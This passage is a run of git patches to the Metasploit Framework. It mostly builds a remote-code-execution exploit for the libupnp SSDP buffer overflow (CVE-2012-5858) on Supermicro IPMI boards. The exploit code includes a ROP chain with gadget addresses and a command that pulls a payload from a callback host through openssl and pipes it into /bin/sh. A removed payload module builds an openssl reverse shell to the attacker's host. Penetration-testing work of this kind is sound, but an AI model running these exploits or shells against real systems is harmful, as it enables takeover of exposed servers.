#{res3.code} reply for invalid YAML") @@ -82,7 +86,7 @@ def run_host(ip) :refs => self.references }) else - vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set") + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set") end end From 5e0c18af2fcd5fddbabdd42305bef0dda51e48a4 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:14:42 -0600 Subject: [PATCH 243/421] adding self to credits --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index e55f6f571d8d..7df91ce0636f 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -19,7 +19,10 @@ def initialize(info={}) This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the XML request processor. }, - 'Author' => 'hdm', + 'Author' => [ + 'hdm', #author + 'jjarmoc' #improvements + ], 'License' => MSF_LICENSE, 'References' => [ From 5be4d414204637296d6463dff5965ea25bfc84e3 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:35:14 -0600 Subject: [PATCH 244/421] This is redundant/less-reliable than reverse_openssl --- .../cmd/unix/reverse_openssl_double.rb | 68 ------------------- 1 file changed, 68 deletions(-) delete mode 100644 modules/payloads/singles/cmd/unix/reverse_openssl_double.rb diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb deleted file mode 100644 index 2343ed2d69fd..000000000000 --- a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb +++ /dev/null @@ -1,68 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'msf/core/handler/reverse_tcp_double_ssl' -require 'msf/base/sessions/command_shell' -require 'msf/base/sessions/command_shell_options' - -module Metasploit3 - - include Msf::Payload::Single - include Msf::Sessions::CommandShellOptions - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)', - 'Version' => '$Revision$', - 'Description' => 'Creates an interactive shell through two openssl encrypted inbound connections', - 'Author' => [ - 'hdm', # Original module - 'RageLtMan', # SSL support - ], - 'License' => MSF_LICENSE, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Handler' => Msf::Handler::ReverseTcpDoubleSsl, - 'Session' => Msf::Sessions::CommandShell, - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'telnet', - 'Payload' => - { - 'Offsets' => { }, - 'Payload' => '' - } - )) - end - - # - # Constructs the payload - # - def generate - vprint_good(command_string) - return super + command_string - end - - # - # Returns the command string to use for execution - # - def command_string - lhost = datastore['LHOST'] - ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" - lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = '' - cmd += "openssl s_client -connect #{lhost}:#{datastore['LPORT']}|" - cmd += "/bin/sh -i|openssl s_client -connect #{lhost}:#{datastore['LPORT']}" - cmd += " >/dev/null 2>&1 &\n" - return cmd - end - -end From 47f3c09616149fc5059d4f4b30c7e56afa4b513e Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:38:19 -0600 Subject: [PATCH 245/421] Fix typo that snuck in during merge --- .../payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index 67af0c90728f..593e69d71612 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -31,7 +31,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Handler' => Msf::Handler::ReverseTcpDoubleSsl, + 'Handler' => Msf::Handler::ReverseTcpDoubleSSL, 'Session' => Msf::Sessions::CommandShell, 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet', @@ -47,7 +47,7 @@ def initialize(info = {}) # Constructs the payload # def generate - + return super + command_string end From 797e2604a0169068120557a27f414b7a5d44ee0b Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:41:45 -0600 Subject: [PATCH 246/421] Fix missing require in reverse_tcp_ssl --- lib/msf/core/handler/reverse_tcp_ssl.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb index 60f827c7ab97..996b619b07f7 100644 --- a/lib/msf/core/handler/reverse_tcp_ssl.rb +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -1,6 +1,8 @@ require 'rex/socket' require 'thread' +require 'msf/core/handler/reverse_tcp' + module Msf module Handler From 975230c9e7d3144023f69bea96170d4a8c6e934b Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:46:20 -0600 Subject: [PATCH 247/421] Add the first module for unique_service_name() --- .../multi/upnp/libupnp_ssdp_overflow.rb | 244 ++++++++++++++++++ 1 file changed, 244 insertions(+) create mode 100644 modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb new file mode 100644 index 000000000000..4e471fbc443c --- /dev/null +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -0,0 +1,244 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution', + 'Description' => %q{ + This module exploits a buffer overflow in the unique_service_name() + function of libupnp's SSDP processor. The libupnp library is used across + thousands of devices and is referred to as the Intel SDK for UPnP + Devices or the Portable SDK for UPnP Devices. + + Due to size limitations on many devices, this exploit uses a separate TCP + listener to stage the real payload. + }, + 'Author' => [ + 'hdm', + 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-5858' ] + ], + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => + { + + 'BadChars' => + # Bytes 0-8 are not allowed + [*(0..8)].pack("C*") + + # 0x09, 0x0a, 0x0d are allowed + "\x0b\x0c\x0e\x0f" + + # All remaining bytes up to space are restricted + [*(0x10..0x1f)].pack("C*") + + # Also not allowed + "\x7f\x3a" + + # Breaks our string quoting + "\x22", + + # Unlimited since we stage this over a secondary connection + 'Space' => 8000, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + # specific payloads vary widely by device (openssl for IPMI, etc) + } + }, + 'Targets' => + [ + # + # ROP targets are difficult to represent in the hash, use callbacks instead + # + [ "Supermicro Onboard IPMI (X7SPA-HF, X9SCL, X9SCM) Intel SDK 1.3.1", { + :callback => :target_supermicro_ipmi_131 + # SSDP response: + # UPnP/1.0, Intel SDK for UPnP devices/1.3.1 + # http://192.168.x.x:49160/IPMIdevicedesc.xml + # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice + } ] + ], + 'DisclosureDate' => 'Feb 03 2013')) + + register_options( + [ + Opt::RPORT(1900), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) + ], self.class) + end + + def exploit + + unless self.respond_to?(target[:callback]) + print_error("Invalid target specified: no callback function defined") + return + end + + buffer = self.send(target[:callback]) + pkt = + "M-SEARCH * HTTP/1.1\r\n" + + "Host:239.255.255.250:1900\r\n" + + "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) + "Man:\"ssdp:discover\"\r\n" + + "MX:3\r\n\r\n" + + print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...") + connect_udp + udp_sock.put(pkt) + + 1.upto(5) do + ::IO.select(nil, nil, nil, 1) + break if session_created? + end + + handler + disconnect_udp + end + + # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc + def target_supermicro_ipmi_131 + + # Create a fixed-size buffer for the payload + buffer = Rex::Text.rand_text_alpha(2000) + + # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char() + buffer[1,1] = '"' + buffer[1900,1] = '"' + + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + + # Restart the service and use openssl to stage the real payload + # Staged because only ~150 bytes of contiguous data are available before mangling + cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#" + buffer[432, cmd.length] = cmd + + # Adjust $r3 to point from the bottom of the stack back into our buffer + buffer[304,4] = [0x4009daf8].pack("V") # + # 0x4009daf8: add r3, r3, r4, lsl #2 + # 0x4009dafc: ldr r0, [r3, #512] ; 0x200 + # 0x4009db00: pop {r4, r10, pc} + + # The offset (right-shifted by 2 ) to our command string above + buffer[284,4] = [0xfffffe78].pack("V") # + + # Copy $r3 into $r0 + buffer[316,4] = [0x400db0ac].pack("V") + # 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1 + # 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4) + + # Move our stack pointer down so as not to corrupt our payload + buffer[320,4] = [0x400a5568].pack("V") + # 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198 + # 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc} + + # Finally return to system() with $r0 pointing to our string + buffer[141,4] = [0x400add8c].pack("V") + + return buffer +=begin + 00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev + 00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev + 00032000-00055000 rwxp 00000000 00:00 0 [heap] + 40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so + 40015000-40017000 rwxp 00000000 00:00 0 + 4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so + 4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so + 4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so + 4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so + 40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so + 40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so + 40036000-40078000 rwxp 00000000 00:00 0 + 40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so + 40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so + 40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so + 40185000-40187000 rwxp 00000000 00:00 0 + bd600000-bd601000 ---p 00000000 00:00 0 + bd601000-bd800000 rwxp 00000000 00:00 0 + bd800000-bd801000 ---p 00000000 00:00 0 + bd801000-bda00000 rwxp 00000000 00:00 0 + bdc00000-bdc01000 ---p 00000000 00:00 0 + bdc01000-bde00000 rwxp 00000000 00:00 0 + be000000-be001000 ---p 00000000 00:00 0 + be001000-be200000 rwxp 00000000 00:00 0 + be941000-be956000 rwxp 00000000 00:00 0 [stack] +=end + + end + + def stage_real_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + + comm = datastore['ListenerComm'] + if comm == "local" + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => ssl, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + + self.service.on_client_connect_proc = Proc.new { |client| + stage_real_payload(client) + } + + # Start the listening service + self.service.start + end + + # + # Shut down any running services + # + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.kind_of?(Rex::Service) + if self.service.kind_of?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::Exception + end + end + end + + attr_accessor :service +end From 94953d04506404b7886ce9daf773ad912c8b35fb Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:48:13 -0600 Subject: [PATCH 248/421] Fix idents from copypasta --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 4e471fbc443c..a799eb3a3c6e 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -94,9 +94,9 @@ def exploit pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + - "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) - "Man:\"ssdp:discover\"\r\n" + - "MX:3\r\n\r\n" + "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) + "Man:\"ssdp:discover\"\r\n" + + "MX:3\r\n" print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...") connect_udp From 214a60aa01e7286a0cca4f61ac6af768f9ac6373 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:52:33 -0600 Subject: [PATCH 249/421] iFix spacing --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index a799eb3a3c6e..30f9146db29b 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -22,7 +22,7 @@ def initialize(info = {}) Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP - listener to stage the real payload. + listener to stage the real payload. }, 'Author' => [ 'hdm', @@ -94,7 +94,7 @@ def exploit pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + - "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) + "ST:uuid:schemas:device:" + buffer + ":end\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n" From 1f227243b8a2d7ea724b3f72e38ffb14011fbe61 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:54:25 -0600 Subject: [PATCH 250/421] Make it clear BadChars are ignored --- .../multi/upnp/libupnp_ssdp_overflow.rb | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 30f9146db29b..6e6202a3abea 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -38,18 +38,21 @@ def initialize(info = {}) 'Privileged' => true, 'Payload' => { - - 'BadChars' => - # Bytes 0-8 are not allowed - [*(0..8)].pack("C*") + - # 0x09, 0x0a, 0x0d are allowed - "\x0b\x0c\x0e\x0f" + - # All remaining bytes up to space are restricted - [*(0x10..0x1f)].pack("C*") + - # Also not allowed - "\x7f\x3a" + - # Breaks our string quoting - "\x22", +# +# # The following BadChars do not apply since we stage the payload +# # through a secondary connection. This is just for reference. +# +# 'BadChars' => +# # Bytes 0-8 are not allowed +# [*(0..8)].pack("C*") + +# # 0x09, 0x0a, 0x0d are allowed +# "\x0b\x0c\x0e\x0f" + +# # All remaining bytes up to space are restricted +# [*(0x10..0x1f)].pack("C*") + +# # Also not allowed +# "\x7f\x3a" + +# # Breaks our string quoting +# "\x22", # Unlimited since we stage this over a secondary connection 'Space' => 8000, From 9e491f0b1c58129f9464245dfdd089874329ffef Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 18:03:19 -0600 Subject: [PATCH 251/421] Add a fingerprint string and more comments --- .../multi/upnp/libupnp_ssdp_overflow.rb | 21 ++++++++++++++----- 1 file changed, 16 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 6e6202a3abea..e5b2f8fccedc 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -68,12 +68,23 @@ def initialize(info = {}) # # ROP targets are difficult to represent in the hash, use callbacks instead # - [ "Supermicro Onboard IPMI (X7SPA-HF, X9SCL, X9SCM) Intel SDK 1.3.1", { - :callback => :target_supermicro_ipmi_131 + [ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", { + + # The callback handles all target-specific settings + :callback => :target_supermicro_ipmi_131, + + # This matches the Server header of a SSDP reply + :fingerprint_server => + /Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/ + + # # SSDP response: - # UPnP/1.0, Intel SDK for UPnP devices/1.3.1 - # http://192.168.x.x:49160/IPMIdevicedesc.xml - # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice + # Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1 + # http://192.168.xx.xx:49152/IPMIdevicedesc.xml + # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice + + # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03) + } ] ], 'DisclosureDate' => 'Feb 03 2013')) From c24da99104bf89802a6cb1934fc26ae2b07bfea4 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 18:13:28 -0600 Subject: [PATCH 252/421] Update authors, add Richard (thanks!) --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index e5b2f8fccedc..7ddbff922fc0 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -25,8 +25,9 @@ def initialize(info = {}) listener to stage the real payload. }, 'Author' => [ - 'hdm', - 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' + 'hdm', # Exploit dev for Supermicro IPMI + 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' # Exploit dev for Supermicro IPMI + 'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI ], 'License' => MSF_LICENSE, 'References' => From 42c8a2d2655609563133138d6e8dfc78046d4a28 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 18:17:51 -0600 Subject: [PATCH 253/421] Add VU and blog references --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 7ddbff922fc0..efc99b7ec005 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -32,7 +32,9 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2012-5858' ] + [ 'CVE', '2012-5858' ], + [ 'US-CERT-VU', '922681' ], + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, From 0660347fca6afab5e3640c95722b06dd0409311e Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 21:06:57 -0600 Subject: [PATCH 254/421] Explicit mult-line match --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index fba5a396e7c2..48990169786a 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -38,7 +38,7 @@ def setup "ST:upnp:rootdevice\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n" + - "\r\n\r\n" # Non-standard, but helps + "\r\n" end def scanner_prescan(batch) @@ -144,14 +144,14 @@ def scanner_process(data, shost, sport) } } - if data =~ /^Server:[\s]*(.*)/i + if data =~ /^Server:[\s]*(.*)/mi @results[skey][:info][:server] = $1.strip end ssdp_host = nil ssdp_port = 80 location_string = '' - if data =~ /^Location:[\s]*(.*)/i + if data =~ /^Location:[\s]*(.*)/mi location_string = $1 @results[skey][:info][:location] = $1.strip if location_string[/(https?):\x2f\x2f([^\x5c\x2f]+)/] @@ -168,7 +168,7 @@ def scanner_process(data, shost, sport) end end - if data =~ /^USN:[\s]*(.*)/i + if data =~ /^USN:[\s]*(.*)/mi @results[skey][:info][:usn] = $1.strip end From 9379c68e512c78f3d94f1baad86445de5dc690a1 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 21:23:05 -0600 Subject: [PATCH 255/421] Fix typo, auto-fingerprint, unconnected sockets --- .../multi/upnp/libupnp_ssdp_overflow.rb | 109 +++++++++++++++--- 1 file changed, 92 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index efc99b7ec005..85df37ca44ae 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -10,8 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::Remote::Udp - def initialize(info = {}) super(update_info(info, 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution', @@ -26,7 +24,7 @@ def initialize(info = {}) }, 'Author' => [ 'hdm', # Exploit dev for Supermicro IPMI - 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' # Exploit dev for Supermicro IPMI + 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI 'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI ], 'License' => MSF_LICENSE, @@ -68,6 +66,9 @@ def initialize(info = {}) }, 'Targets' => [ + + [ "Automatic", { } ], + # # ROP targets are difficult to represent in the hash, use callbacks instead # @@ -76,9 +77,9 @@ def initialize(info = {}) # The callback handles all target-specific settings :callback => :target_supermicro_ipmi_131, - # This matches the Server header of a SSDP reply - :fingerprint_server => - /Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/ + # This matches any line of the SSDP M-SEARCH response + :fingerprint => + /Server:\s*(.*|Linux\/2\.6\.17\.WB_WPCM450\.1\.3) UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi # # SSDP response: @@ -90,44 +91,52 @@ def initialize(info = {}) } ] ], - 'DisclosureDate' => 'Feb 03 2013')) + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 29 2013')) register_options( [ + Opt::RHOST(), Opt::RPORT(1900), OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) ], self.class) end + def exploit - unless self.respond_to?(target[:callback]) + configure_socket + + target_info = choose_target + + unless self.respond_to?(target_info[:callback]) print_error("Invalid target specified: no callback function defined") return end - buffer = self.send(target[:callback]) + buffer = self.send(target_info[:callback]) pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + "ST:uuid:schemas:device:" + buffer + ":end\r\n" + "Man:\"ssdp:discover\"\r\n" + - "MX:3\r\n" + "MX:3\r\n\r\n" + + print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...") - print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...") - connect_udp - udp_sock.put(pkt) + r = udp_sock.sendto(pkt, rhost, rport, 0) 1.upto(5) do ::IO.select(nil, nil, nil, 1) break if session_created? end - handler - disconnect_udp + # No handler() support right now end + + # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc def target_supermicro_ipmi_131 @@ -135,8 +144,8 @@ def target_supermicro_ipmi_131 buffer = Rex::Text.rand_text_alpha(2000) # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char() - buffer[1,1] = '"' - buffer[1900,1] = '"' + buffer[0,1] = '"' + buffer[1999,1] = '"' # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) @@ -257,5 +266,71 @@ def cleanup end end + def choose_target + # If the user specified a target, use that one + return self.target unless self.target.name =~ /Automatic/ + + msearch = + "M-SEARCH * HTTP/1.1\r\n" + + "Host:239.255.255.250:1900\r\n" + + "ST:upnp:rootdevice\r\n" + + "Man:\"ssdp:discover\"\r\n" + + "MX:3\r\n\r\n" + + # Fingerprint the service through SSDP + udp_sock.sendto(msearch, rhost, rport, 0) + + res = nil + 1.upto(5) do + res,addr,info = udp_sock.recvfrom(65535, 1.0) + break if res and res =~ /^(Server|Location)/mi + udp_sock.sendto(msearch, rhost, rport, 0) + end + + self.targets.each do |t| + return t if t[:fingerprint] and res =~ t[:fingerprint] + end + + if res and res.to_s.length > 0 + print_status("No target matches this fingerprint") + print_status("") + res.to_s.split("\n").each do |line| + print_status(" #{line.strip}") + end + print_status("") + else + print_status("The system #{rhost} did not reply to our M-SEARCH probe") + end + + fail_with(Exploit::Failure::NoTarget, "No compatible target detected") + end + + # Accessor for our TCP payload stager attr_accessor :service + + # We need an unconnected socket because SSDP replies often come + # from a different sent port than the one we sent to. This also + # breaks the standard UDP mixin. + def configure_socket + self.udp_sock = Rex::Socket::Udp.create({ + 'Context' => { 'Msf' => framework, 'MsfExploit' => self } + }) + add_socket(self.udp_sock) + end + + # + # Required since we aren't using the normal mixins + # + + def rhost + datastore['RHOST'] + end + + def rport + datastore['RPORT'] + end + + # Accessor for our UDP socket + attr_accessor :udp_sock + end From 191eed88bc57bc6587fb7527944c0304a0ff57e6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 21:50:03 -0600 Subject: [PATCH 256/421] Fix liberal matching expression on target --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 85df37ca44ae..b473cb369160 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -79,7 +79,7 @@ def initialize(info = {}) # This matches any line of the SSDP M-SEARCH response :fingerprint => - /Server:\s*(.*|Linux\/2\.6\.17\.WB_WPCM450\.1\.3) UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi + /Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi # # SSDP response: From 4c8811bb8a6db6b50499b85a1d9d1f3f9f953297 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 23:24:44 -0600 Subject: [PATCH 257/421] Add a debug target --- .../exploits/multi/upnp/libupnp_ssdp_overflow.rb | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git 